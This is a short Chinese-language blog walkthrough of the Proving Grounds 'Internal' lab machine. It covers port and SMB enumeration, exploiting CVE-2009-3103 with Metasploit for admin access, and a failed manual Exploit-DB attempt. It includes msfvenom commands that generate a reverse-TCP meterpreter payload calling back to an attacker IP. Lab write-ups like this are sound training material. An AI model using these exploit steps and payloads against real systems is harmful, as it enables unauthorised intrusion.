Proving Grounds Practice : Internal Walkthrough
Proving Grounds Practice : Internal Walkthrough
Foothole (立足點 ) :
- 列舉常用的技術沒有發現,改用 nmapAutomator.sh 發現 CVE-2009-3103 漏洞
- Metasploit 直接利用就進去了
PE ( 提權 ) :
- 不用 PE,進去就管理者了
注意事項 :
- 甚麼都找不到的時候記得 nmapAutomator.sh 給它下去就對了
Kali IP : 192.168.45.167
靶機 IP : 192.168.164.40
第一步掃 Port,└─$ rustscan -a 192.168.164.40 --scripts none --ulimit 5000 | tee rustscan
snmp 沒開,└─$ sudo nmap -sU -p 161 192.168.164.40 | tee snmp
enum4linux 沒啥有用的資訊,└─$ enum4linux -a 192.168.164.40 | tee enum4linux
5357 /
5357 /robots.txt
gobuster 5357 也沒有東西,└─$ gobuster -w ./dirfuzzing.txt dir -u http://192.168.164.40:5357 -c -t 150 --exclude-length 326 -x txt,pdf,git,aspx | tee gobuster
暫時卡住,只好改用耗時間的 nmapAutomator.sh 試試看
參考 : https://github.com/21y4d/nmapAutomator
第一步先用參數 -Full,└─$ ./nmapAutomator.sh -H 192.168.164.40 -t Full | tee nmapauto-full
接著繼續用餐數 -Vulns,└─$ ./nmapAutomator.sh -H 192.168.164.40 -t Vulns | tee nmapauto-vulns
再次使用 nmap 帶 script 測試 SMB 漏洞,└─$ sudo nmap -script=smb-vuln\* -p445 192.168.164.40
發現 MS09-050,CVE-2009-3103 搜尋 Exploit-DB 發現有 Metasploit
直接先試試看 Metasploit,└─$ sudo msfconsole -q
show options 看看與改好
直接進去就管理者了
參考 Exploit-DB 試著用手動打打看,使用第一個 40280 有 Python 的試試看
python code 裡面有說明要自己建立 payload,#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.30.77 LPORT=443 EXITFUNC=thread -f python
建立 payload 然後改 Code
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.167 LPORT=4444 EXITFUNC=thread -f python
結果失敗.......GG,手動沒有成功
留言
張貼留言